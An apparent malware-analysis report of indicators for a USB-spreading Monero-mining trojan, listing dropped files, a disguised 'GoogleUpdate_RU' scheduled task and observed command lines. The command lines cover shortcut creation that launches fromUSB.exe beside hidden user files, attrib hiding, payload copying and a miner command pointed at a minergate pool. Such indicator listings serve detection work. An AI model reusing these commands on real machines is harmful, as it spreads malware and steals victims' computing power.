Technical Information
- <SYSTEM32>\tasks\googleupdate_ru
- <Drive name for removable media>:\recycle.bin\xmr.exe
- <Drive name for removable media>:\recycle.bin\fromusb.exe
- <Drive name for removable media>:\archer.avi.lnk
- <Drive name for removable media>:\correct.avi.lnk
- <Drive name for removable media>:\000814251_video_01.avi.lnk
- <Drive name for removable media>:\delete.avi.lnk
- <Drive name for removable media>:\join.avi.lnk
- <Drive name for removable media>:\dashborder_96.bmp.lnk
- <Drive name for removable media>:\default.bmp.lnk
- <Drive name for removable media>:\dashborder_144.bmp.lnk
- <Drive name for removable media>:\tileimage.bmp.lnk
- <Drive name for removable media>:\toolbar.bmp.lnk
- <Drive name for removable media>:\sdkfailsafeemulator.cer.lnk
- <Drive name for removable media>:\contoso.cer.lnk
- <Drive name for removable media>:\contosoroot_1.cer.lnk
- <Drive name for removable media>:\contoso_1.cer.lnk
- %TEMP%\rarsfx0\noods.exe
- %LOCALAPPDATA%\googleupdater\fromusb.exe
- %LOCALAPPDATA%\googleupdater\nscpucnminer32.exe
- %LOCALAPPDATA%\googleupdater\cpu32.exe
- %LOCALAPPDATA%\googleupdater\cpu64.exe
- %LOCALAPPDATA%\googleupdater\nscpucnminer64.exe
- %LOCALAPPDATA%\googleupdater\schost.exe
- %LOCALAPPDATA%\googleupdater\info.xml
- %LOCALAPPDATA%\googleupdater\tousb.exe
- %TEMP%\8c95.tmp\scstarter.bat
- %TEMP%\8c95.tmp\cpu.exe
- %TEMP%\92fb.tmp\cmsm.bat
- %TEMP%\96c2.tmp\cpu64.bat
- %LOCALAPPDATA%\googleupdater\1737137917_log.txt
- %LOCALAPPDATA%\googleupdater\xxmklink.exe
- %TEMP%\63ff.tmp\checkdate.bat
- %LOCALAPPDATA%\googleupdater\cmsm.exe
- %LOCALAPPDATA%\mozilla\checkdate.exe
- %TEMP%\48f1.tmp\checkdate.exe
- %TEMP%\40e6.tmp\40e7.bat
- %TEMP%\40e6.tmp\xmr.exe
- %LOCALAPPDATA%\mozilla\xmr.exe
- %TEMP%\48f1.tmp\reserver.bat
- %TEMP%\48f1.tmp\cmsm.exe
- %TEMP%\48f1.tmp\cpu32.exe
- %TEMP%\rarsfx1\nood.exe
- %TEMP%\48f1.tmp\cpu64.exe
- %TEMP%\48f1.tmp\info.xml
- %TEMP%\48f1.tmp\nscpucnminer32.exe
- %TEMP%\48f1.tmp\nscpucnminer64.exe
- %TEMP%\48f1.tmp\schost.exe
- %TEMP%\48f1.tmp\tousb.exe
- %TEMP%\48f1.tmp\xxmklink.exe
- %TEMP%\48f1.tmp\fromusb.exe
- %TEMP%\ceb.tmp\checkdate.bat
- %TEMP%\16ca.tmp\tousb.bat
- %LOCALAPPDATA%\mozilla\xmr.exe
- %LOCALAPPDATA%\mozilla\checkdate.exe
- <Drive name for removable media>:\recycle.bin\xmr.exe
- <Drive name for removable media>:\recycle.bin\fromusb.exe
- %TEMP%\40e6.tmp\xmr.exe
- %TEMP%\48f1.tmp\reserver.bat
- %TEMP%\48f1.tmp\checkdate.exe
- %TEMP%\48f1.tmp\xxmklink.exe
- %TEMP%\48f1.tmp\tousb.exe
- %TEMP%\48f1.tmp\schost.exe
- %TEMP%\48f1.tmp\nscpucnminer64.exe
- %TEMP%\48f1.tmp\nscpucnminer32.exe
- %TEMP%\48f1.tmp\info.xml
- %TEMP%\48f1.tmp\fromusb.exe
- %TEMP%\96c2.tmp\cpu64.bat
- %TEMP%\48f1.tmp\cpu64.exe
- %TEMP%\48f1.tmp\cmsm.exe
- %LOCALAPPDATA%\googleupdater\info.xml
- %TEMP%\92fb.tmp\cmsm.bat
- %TEMP%\8c95.tmp\scstarter.bat
- %TEMP%\8c95.tmp\cpu.exe
- %TEMP%\63ff.tmp\checkdate.bat
- %TEMP%\rarsfx0\noods.exe
- %TEMP%\rarsfx1\nood.exe
- %TEMP%\40e6.tmp\40e7.bat
- %TEMP%\48f1.tmp\cpu32.exe
- %TEMP%\ceb.tmp\checkdate.bat
- 'xm#.###l.minergate.com':45560
- DNS ASK xm#.###l.minergate.com
- ClassName: 'EDIT' WindowName: ''
- '%TEMP%\rarsfx0\noods.exe' -pgreatest
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\TestCertificate.cer.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\TestCertificate.cer & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\pmd.cer.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\pmd.cer & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\uep_form_786_bulletin_1726i602.doc.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\uep_form_786_bulletin_1726i602.doc & start /B /D .\ .\Recycle.Bin\fromUSB.ex...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\weeklysheet1215.doc.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\weeklysheet1215.doc & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\508softwareandos.doc.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\508softwareandos.doc & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\cveuropeo.doc.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\cveuropeo.doc & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\sdszfo.docx.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\sdszfo.docx & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\thlps_keeper_mayer_1965.docx.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\thlps_keeper_mayer_1965.docx & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\nwfieldnotes1966.docx.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\nwfieldnotes1966.docx & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\she...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\aoc_saq_d_v3_merchant.docx.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\aoc_saq_d_v3_merchant.docx & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYS...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\glidescope_review_rev_010.docx.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\glidescope_review_rev_010.docx & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" ""...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\calc.exe.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\calc.exe & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\tcm851ax32.exe.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\tcm851ax32.exe & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\skypesetup.exe.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\skypesetup.exe & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\notepad.exe.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\notepad.exe & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\dotnetfx45_full_setup.exe.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\dotnetfx45_full_setup.exe & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTE...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\iTunesHelpUnavailable.htm.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\iTunesHelpUnavailable.htm & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTE...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\about.htm.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\about.htm & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\advice_process.htm.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\advice_process.htm & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.d...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\contoso_1.cer.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\contoso_1.cer & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\alert.htm.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\alert.htm & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\contosoroot_1.cer.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\contosoroot_1.cer & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\SDKFailsafeEmulator.cer.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\SDKFailsafeEmulator.cer & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>...
- '%TEMP%\rarsfx1\nood.exe'
- '%LOCALAPPDATA%\mozilla\xmr.exe'
- '%LOCALAPPDATA%\mozilla\checkdate.exe'
- '%LOCALAPPDATA%\googleupdater\schost.exe'
- '%TEMP%\8c95.tmp\cpu.exe'
- '%LOCALAPPDATA%\googleupdater\cmsm.exe'
- '%LOCALAPPDATA%\googleupdater\cpu64.exe'
- '%LOCALAPPDATA%\googleupdater\nscpucnminer64.exe' -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u noodon@yandex.ru -p x -t 1
- '%LOCALAPPDATA%\googleupdater\tousb.exe'
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\archer.avi.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\archer.avi & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\correct.avi.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\correct.avi & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\000814251_video_01.avi.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\000814251_video_01.avi & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\s...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\delete.avi.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\delete.avi & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\join.avi.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\join.avi & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\dashBorder_96.bmp.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\dashBorder_96.bmp & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\default.bmp.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\default.bmp & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\dashBorder_144.bmp.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\dashBorder_144.bmp & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.d...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\tileimage.bmp.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\tileimage.bmp & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\toolbar.bmp.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\toolbar.bmp & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\contoso.cer.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\contoso.cer & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\iisstart.htm.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\iisstart.htm & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\40E6.tmp\40E7.bat %TEMP%\RarSFX1\NooD.exe"
- '%WINDIR%\syswow64\xcopy.exe' /y "%LOCALAPPDATA%\GoogleUpdater\fromUSB.exe" "<Drive name for removable media>:\Recycle.Bin\"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\contosoroot_1.cer"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\contoso.cer"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\SDKFailsafeEmulator.cer"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\toolbar.bmp"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\tileimage.bmp"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\dashBorder_144.bmp"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\default.bmp"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\dashBorder_96.bmp"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\join.avi"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\delete.avi"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\000814251_video_01.avi"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\correct.avi"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\cveuropeo.doc"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\Recycle.Bin\fromUSB.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "%LOCALAPPDATA%\Mozilla\xmr.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\sdszfo.docx"
- '%WINDIR%\syswow64\cmd.exe' /c dir /b /a "<Drive name for removable media>:\"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\thlps_keeper_mayer_1965.docx"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\notepad.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\TestCertificate.cer"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\uep_form_786_bulletin_1726i602.doc"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\alert.htm"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\advice_process.htm"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\about.htm"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\iTunesHelpUnavailable.htm"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\dotnetfx45_full_setup.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\glidescope_review_rev_010.docx"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\skypesetup.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\tcm851ax32.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\calc.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\contoso_1.cer"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\aoc_saq_d_v3_merchant.docx"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\nwfieldnotes1966.docx"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\Recycle.Bin\xmr.exe"
- '%WINDIR%\syswow64\xcopy.exe' /y "%LOCALAPPDATA%\Mozilla\xmr.exe" "<Drive name for removable media>:\Recycle.Bin\"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\archer.avi"
- '<SYSTEM32>\attrib.exe' +h +s "%LOCALAPPDATA%\Mozilla\xmr.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\pmd.cer"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\508softwareandos.doc"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\Recycle.Bin"
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\63FF.tmp\checkdate.bat" "
- '%WINDIR%\syswow64\attrib.exe' +h +s "%LOCALAPPDATA%\Mozilla\checkdate.exe"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\XXMKLINK.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\toUSB.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\NsCpuCNMiner64.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\CPU64.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\CPU32.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\attrib.exe' -h -s "%LOCALAPPDATA%\Mozilla\xmr.exe"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\NsCpuCNMiner32.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\info.xml" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\schost.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\cmsm.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\checkdate.exe" "%LOCALAPPDATA%\Mozilla\"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\weeklysheet1215.doc"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\iisstart.htm"
- '<SYSTEM32>\xcopy.exe' /y "%TEMP%\40E6.tmp\xmr.exe" "%LOCALAPPDATA%\Mozilla\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\fromUSB.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\tasklist.exe'
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\64bit_notes.htm"
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\48F1.tmp\reserver.bat" "
- '%WINDIR%\syswow64\schtasks.exe' /create /tn "GoogleUpdate_RU" /xml "%LOCALAPPDATA%\GoogleUpdater\info.xml"
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\8C95.tmp\scstarter.bat" "
- '%WINDIR%\syswow64\cmd.exe' /c %USERPROFILE%\AppData\Local\GoogleUpdater\cmsm.exe
- '%WINDIR%\syswow64\find.exe' /i "NsCpuCNMiner64.exe"
- '%WINDIR%\syswow64\wbem\wmic.exe' logicaldisk where (drivetype="2") get name,volumeserialnumber /format:csv
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\96C2.tmp\CPU64.bat" "
- '%WINDIR%\syswow64\cmd.exe' /c "wmic logicaldisk where (drivetype="2") get name,volumeserialnumber /format:csv" 2>nul
- '<SYSTEM32>\taskeng.exe' {E4D997D4-3C86-4105-8498-308D00CEBCDD} S-1-5-21-3691498038-2086406363-2140527554-1000:ypckhigq\user:Interactive:[1]
- '%WINDIR%\syswow64\find.exe' /i "NsCpuCNMiner32.exe"
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\CEB.tmp\checkdate.bat" "
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\16CA.tmp\toUSB.bat" "
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\92FB.tmp\cmsm.bat" "
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\48F1.tmp\reserver.bat" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\16CA.tmp\toUSB.bat" "' (with hidden window)
- '%LOCALAPPDATA%\mozilla\checkdate.exe' ' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\8C95.tmp\scstarter.bat" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\96C2.tmp\CPU64.bat" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\92FB.tmp\cmsm.bat" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\CEB.tmp\checkdate.bat" "' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\40E6.tmp\40E7.bat %TEMP%\RarSFX1\NooD.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\63FF.tmp\checkdate.bat" "' (with hidden window)